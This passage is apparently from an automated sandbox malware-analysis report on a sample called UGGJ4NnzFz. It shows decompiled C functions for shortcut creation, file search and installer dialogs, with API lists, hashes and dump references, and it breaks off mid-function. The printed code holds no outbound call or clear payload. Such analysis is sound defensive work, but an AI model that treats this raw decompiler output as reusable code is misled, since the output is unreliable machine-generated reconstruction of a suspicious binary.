                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                • API String ID: 900638850-1230650788
                                                                                                                • Opcode ID: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                                                • Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
                                                                                                                • Opcode Fuzzy Hash: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                                                • Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E004056C6(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409368, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                                                0x00402029
                                                                                                                0x00402033
                                                                                                                0x0040203c
                                                                                                                0x00402046
                                                                                                                0x0040204f
                                                                                                                0x00402059
                                                                                                                0x0040205d
                                                                                                                0x0040205d
                                                                                                                0x00402062
                                                                                                                0x00402073
                                                                                                                0x0040207b
                                                                                                                0x0040215b
                                                                                                                0x0040215b
                                                                                                                0x00402162
                                                                                                                0x00402081
                                                                                                                0x00402081
                                                                                                                0x00402092
                                                                                                                0x00402096
                                                                                                                0x0040209c
                                                                                                                0x004020a6
                                                                                                                0x004020a8
                                                                                                                0x004020b3
                                                                                                                0x004020b6
                                                                                                                0x004020c3
                                                                                                                0x004020c5
                                                                                                                0x004020c7
                                                                                                                0x004020ce
                                                                                                                0x004020d1
                                                                                                                0x004020d1
                                                                                                                0x004020d4
                                                                                                                0x004020de
                                                                                                                0x004020e6
                                                                                                                0x004020eb
                                                                                                                0x004020f7
                                                                                                                0x004020f7
                                                                                                                0x004020fa
                                                                                                                0x00402103
                                                                                                                0x00402106
                                                                                                                0x0040210f
                                                                                                                0x00402114
                                                                                                                0x00402126
                                                                                                                0x00402135
                                                                                                                0x00402137
                                                                                                                0x00402143
                                                                                                                0x00402143
                                                                                                                0x00402135
                                                                                                                0x00402145
                                                                                                                0x0040214b
                                                                                                                0x0040214b
                                                                                                                0x0040214e
                                                                                                                0x00402154
                                                                                                                0x00402159
                                                                                                                0x0040216e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402159
                                                                                                                0x00402164
                                                                                                                0x0040288e
                                                                                                                0x0040289a

                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 004020AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                • API String ID: 123533781-501415292
                                                                                                                • Opcode ID: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                                                • Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
                                                                                                                • Opcode Fuzzy Hash: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                                                • Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AC4(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B66();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                                0x00402656
                                                                                                                0x0040266a
                                                                                                                0x00402675
                                                                                                                0x00402676
                                                                                                                0x004027b1
                                                                                                                0x00402658
                                                                                                                0x00402658
                                                                                                                0x0040265a
                                                                                                                0x0040265c
                                                                                                                0x0040265c
                                                                                                                0x0040288e
                                                                                                                0x0040289a

                                                                                                                APIs
                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 1974802433-0
                                                                                                                • Opcode ID: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                                                • Instruction ID: b3d2387cb92b068db8966d6a1439c3c253679041c8135bb289436d91baf53d0e
                                                                                                                • Opcode Fuzzy Hash: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                                                • Instruction Fuzzy Hash: 42F0A072A04201DBD700EBB49A89AEEB7789B51328F60067BE111F20C1C6B85A459B2E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403A45, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E00403A45(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420484 = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420498 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f460 = _t91;
						E00403F18(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420484 = 1;
					}
					_t122 =  *0x4091c4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F64(0x40b);
						while(1) {
							_t37 =  *0x420484;
							 *0x4091c4 =  *0x4091c4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091c4; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091c4 -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405B88(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F18(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F3A(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f460, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420498);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f460);
							}
							E00403F4D();
							E00405B66(0x4204a0, 0x4236a0);
							E00405B88(0x4204a0, _t125, _t130,  &(0x4204a0[lstrlenA(0x4204a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x4204a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc70 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F18(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403F64(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f868);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420478, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420478,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F7F(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f868 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EF1();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f868 = _t127;
										goto L21;
									}
									__eflags =  *0x4091c4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x4214a0 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x4214a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                                                                                0x00403a4e
                                                                                                                0x00403a57
                                                                                                                0x00403b98
                                                                                                                0x00403b9c
                                                                                                                0x00403ba0
                                                                                                                0x00403ba2
                                                                                                                0x00403ba7
                                                                                                                0x00403bb2
                                                                                                                0x00403bbd
                                                                                                                0x00403bc2
                                                                                                                0x00403bc4
                                                                                                                0x00403bc6
                                                                                                                0x00403bc9
                                                                                                                0x00403bce
                                                                                                                0x00403bdc
                                                                                                                0x00403be9
                                                                                                                0x00403bf0
                                                                                                                0x00403bf0
                                                                                                                0x00403bf1
                                                                                                                0x00403bf1
                                                                                                                0x00403bf6
                                                                                                                0x00403bfc
                                                                                                                0x00403c03
                                                                                                                0x00403c09
                                                                                                                0x00403c0b
                                                                                                                0x00403c4b
                                                                                                                0x00403c50
                                                                                                                0x00403c55
                                                                                                                0x00403c55
                                                                                                                0x00403c5a
                                                                                                                0x00403c63
                                                                                                                0x00403c65
                                                                                                                0x00403c6a
                                                                                                                0x00403c70
                                                                                                                0x00403c74
                                                                                                                0x00403c74
                                                                                                                0x00403c79
                                                                                                                0x00403c7f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403c8a
                                                                                                                0x00403c90
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403c99
                                                                                                                0x00403ca1
                                                                                                                0x00403ca6
                                                                                                                0x00403ca9
                                                                                                                0x00403caf
                                                                                                                0x00403cb4
                                                                                                                0x00403cb7
                                                                                                                0x00403cbd
                                                                                                                0x00403cc2
                                                                                                                0x00403cc5
                                                                                                                0x00403ccb
                                                                                                                0x00403cd3
                                                                                                                0x00403cd9
                                                                                                                0x00403cdf
                                                                                                                0x00403ce3
                                                                                                                0x00403cea
                                                                                                                0x00403cea
                                                                                                                0x00403cea
                                                                                                                0x00403cf4
                                                                                                                0x00403d06
                                                                                                                0x00403d12
                                                                                                                0x00403d17
                                                                                                                0x00403d21
                                                                                                                0x00403d27
                                                                                                                0x00403d29
                                                                                                                0x00403d2e
                                                                                                                0x00403d2b
                                                                                                                0x00403d2b
                                                                                                                0x00403d2b
                                                                                                                0x00403d3e
                                                                                                                0x00403d56
                                                                                                                0x00403d58
                                                                                                                0x00403d5e
                                                                                                                0x00403d73
                                                                                                                0x00403d60
                                                                                                                0x00403d69
                                                                                                                0x00403d6b
                                                                                                                0x00403d6b
                                                                                                                0x00403d79
                                                                                                                0x00403d89
                                                                                                                0x00403d9a
                                                                                                                0x00403da1
                                                                                                                0x00403da7
                                                                                                                0x00403dab
                                                                                                                0x00403db0
                                                                                                                0x00403db2
                                                                                                                0x00000000
                                                                                                                0x00403db8
                                                                                                                0x00403db8
                                                                                                                0x00403dba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403dc0
                                                                                                                0x00403dc4
                                                                                                                0x00403de9
                                                                                                                0x00403def
                                                                                                                0x00403df5
                                                                                                                0x00403df7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403e1d
                                                                                                                0x00403e23
                                                                                                                0x00403e25
                                                                                                                0x00403e2a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403e30
                                                                                                                0x00403e33
                                                                                                                0x00403e36
                                                                                                                0x00403e4d
                                                                                                                0x00403e59
                                                                                                                0x00403e72
                                                                                                                0x00403e78
                                                                                                                0x00403e7c
                                                                                                                0x00403e81
                                                                                                                0x00403e87
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403e91
                                                                                                                0x00403e9c
                                                                                                                0x00000000
                                                                                                                0x00403e9c
                                                                                                                0x00403dc6
                                                                                                                0x00403dcc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403dd2
                                                                                                                0x00403dd8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403dde
                                                                                                                0x00403db2
                                                                                                                0x00403ea9
                                                                                                                0x00403eb5
                                                                                                                0x00403ebc
                                                                                                                0x00000000
                                                                                                                0x00403c0d
                                                                                                                0x00403c0d
                                                                                                                0x00403c10
                                                                                                                0x00403c43
                                                                                                                0x00403c43
                                                                                                                0x00403c45
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403c45
                                                                                                                0x00403c12
                                                                                                                0x00403c16
                                                                                                                0x00403c1b
                                                                                                                0x00403c1d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403c2d
                                                                                                                0x00403c35
                                                                                                                0x00000000
                                                                                                                0x00403c3b
                                                                                                                0x00403a69
                                                                                                                0x00403a69
                                                                                                                0x00403a6d
                                                                                                                0x00403a72
                                                                                                                0x00403a81
                                                                                                                0x00403a81
                                                                                                                0x00403a8a
                                                                                                                0x00403a93
                                                                                                                0x00403a9e
                                                                                                                0x00403a9e
                                                                                                                0x00403aaa
                                                                                                                0x00403ac6
                                                                                                                0x00403ac9
                                                                                                                0x00403adc
                                                                                                                0x00403ae2
                                                                                                                0x00403b85
                                                                                                                0x00000000
                                                                                                                0x00403b8e
                                                                                                                0x00403ae8
                                                                                                                0x00403af5
                                                                                                                0x00403af7
                                                                                                                0x00403af9
                                                                                                                0x00403b18
                                                                                                                0x00403b18
                                                                                                                0x00403b1b
                                                                                                                0x00403b20
                                                                                                                0x00403b23
                                                                                                                0x00403b33
                                                                                                                0x00403b34
                                                                                                                0x00403b36
                                                                                                                0x00403b6c
                                                                                                                0x00403b7f
                                                                                                                0x00000000
                                                                                                                0x00403b7f
                                                                                                                0x00403b38
                                                                                                                0x00403b3e
                                                                                                                0x00403b57
                                                                                                                0x00403b5c
                                                                                                                0x00403b5e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403b60
                                                                                                                0x00403b4c
                                                                                                                0x00403b4c
                                                                                                                0x00403b4e
                                                                                                                0x00403b4e
                                                                                                                0x00000000
                                                                                                                0x00403b4e
                                                                                                                0x00403b41
                                                                                                                0x00403b46
                                                                                                                0x00000000
                                                                                                                0x00403b46
                                                                                                                0x00403b25
                                                                                                                0x00403b2b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403b2d
                                                                                                                0x00000000
                                                                                                                0x00403b2d
                                                                                                                0x00403b1d
                                                                                                                0x00000000
                                                                                                                0x00403b1d
                                                                                                                0x00403b03
                                                                                                                0x00403b0a
                                                                                                                0x00403b10
                                                                                                                0x00403b12
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403b12
                                                                                                                0x00403ace
                                                                                                                0x00000000
                                                                                                                0x00403aac
                                                                                                                0x00403ab2
                                                                                                                0x00403abc
                                                                                                                0x00403ec2
                                                                                                                0x00403ec8
                                                                                                                0x00403ed5
                                                                                                                0x00403edb
                                                                                                                0x00403edb
                                                                                                                0x00403ee5
                                                                                                                0x00000000
                                                                                                                0x00403ee5
                                                                                                                0x00403aaa

                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
                                                                                                                • ShowWindow.USER32(?), ref: 00403A9E
                                                                                                                • DestroyWindow.USER32 ref: 00403AB2
                                                                                                                • SetWindowLongA.USER32 ref: 00403ACE
                                                                                                                • GetDlgItem.USER32 ref: 00403AEF
                                                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B03
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403B0A
                                                                                                                • GetDlgItem.USER32 ref: 00403BB8
                                                                                                                • GetDlgItem.USER32 ref: 00403BC2
                                                                                                                • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
                                                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C2D
                                                                                                                • GetDlgItem.USER32 ref: 00403CD3
                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403CF4
                                                                                                                • EnableWindow.USER32(?,?), ref: 00403D06
                                                                                                                • EnableWindow.USER32(?,?), ref: 00403D21
                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
                                                                                                                • EnableMenuItem.USER32 ref: 00403D3E
                                                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D56
                                                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D69
                                                                                                                • lstrlenA.KERNEL32(004204A0,?,004204A0,004236A0), ref: 00403D92
                                                                                                                • SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403ED5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 184305955-0
                                                                                                                • Opcode ID: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                                                • Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
                                                                                                                • Opcode Fuzzy Hash: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                                                • Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404060, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420480 =  *0x420480 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F7F(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
